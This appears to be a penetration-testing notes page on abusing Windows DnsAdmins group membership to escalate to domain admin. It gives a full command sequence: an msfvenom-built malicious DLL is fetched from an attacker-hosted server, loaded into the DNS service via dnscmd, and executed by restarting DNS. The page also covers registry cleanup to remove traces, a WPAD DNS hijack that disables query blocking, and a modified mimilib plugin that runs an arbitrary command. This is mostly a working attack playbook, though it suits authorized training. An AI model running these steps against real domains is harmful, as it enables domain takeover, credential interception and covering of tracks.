10.DnsAdmins

Approach to Exploiting DnsAdmins

1. Generate a Malicious DLL

msfvenom -p windows/x64/exec cmd='<command>' -f dll -o <dll_name>.dll

2. Host DLL on an HTTP Server

python3 -m http.server <port>

3. Transfer DLL to Target Machine

wget "http://<attacker_ip>:<port>/<dll_name>.dll" -outfile "<dll_name>.dll"

4. Verify Membership in DnsAdmins Group

Get-ADGroupMember -Identity DnsAdmins

5. Load Custom DLL into DNS Server Configuration

dnscmd.exe /config /serverlevelplugindll <dll_path>

6. Check Permissions on DNS Service

Retrieve the Security Identifier (SID) of the user:

wmic useraccount where name="<user>" get sid

Check DNS service permissions:

sc.exe sdshow DNS

7. Restart DNS Service to Trigger Payload Execution

sc stop dns
sc start dns

8. Verify Exploitation

Check if the user was added to the Domain Admins group (if applicable):

net group "Domain Admins" /dom

9. Cleanup (if needed)

Check for the malicious DLL entry:

reg query \\<target_ip>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Remove the DLL entry from the registry:

reg delete \\<target_ip>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

Restart DNS service after cleanup:

sc.exe start dns
sc query dns

10. Alternative Exploit - WPAD Attack

Disable WPAD blocking:

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <dc_hostname>

Create a WPAD DNS record pointing to the attacker's IP:

Add-DnsServerResourceRecordA -Name wpad -ZoneName <domain_name> -ComputerName <dc_hostname> -IPv4Address <attacker_ip>

Commands Used:

msfvenom
python3 -m http.server
wget
dnscmd.exe
wmic
sc.exe
net
reg
Set-DnsServerGlobalQueryBlockList
Add-DnsServerResourceRecordA

PowerShell Cmdlets:

Get-ADGroupMember

Using Mimilib.dll

As detailed in this post, we could also utilize mimilib.dll from the creator of the Mimikatz tool to gain command execution by modifying the kdns.c file to execute a reverse shell one-liner or another command of our choosing.

Code: c

/*	Benjamin DELPY `gentilkiwi`
	https://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdns.h"

DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
{
	return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginCleanup()
{
	return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
	FILE * kdns_logfile;
#pragma warning(push)
#pragma warning(disable:4996)
	if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
#pragma warning(pop)
	{
		klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
		fclose(kdns_logfile);
	    system("ENTER COMMAND HERE");
	}
	return ERROR_SUCCESS;
}

Previous3.Windows Group Privileges Next11. Hyper-V Administrators

Last updated 1 month ago

hashtagApproach to Exploiting DnsAdmins

hashtag1. Generate a Malicious DLL

hashtag2. Host DLL on an HTTP Server

hashtag3. Transfer DLL to Target Machine

hashtag4. Verify Membership in DnsAdmins Group

hashtag5. Load Custom DLL into DNS Server Configuration

hashtag6. Check Permissions on DNS Service

hashtag7. Restart DNS Service to Trigger Payload Execution

hashtag8. Verify Exploitation

hashtag9. Cleanup (if needed)

hashtag10. Alternative Exploit - WPAD Attack

hashtagCommands Used:

hashtagPowerShell Cmdlets:

hashtagUsing Mimilib.dll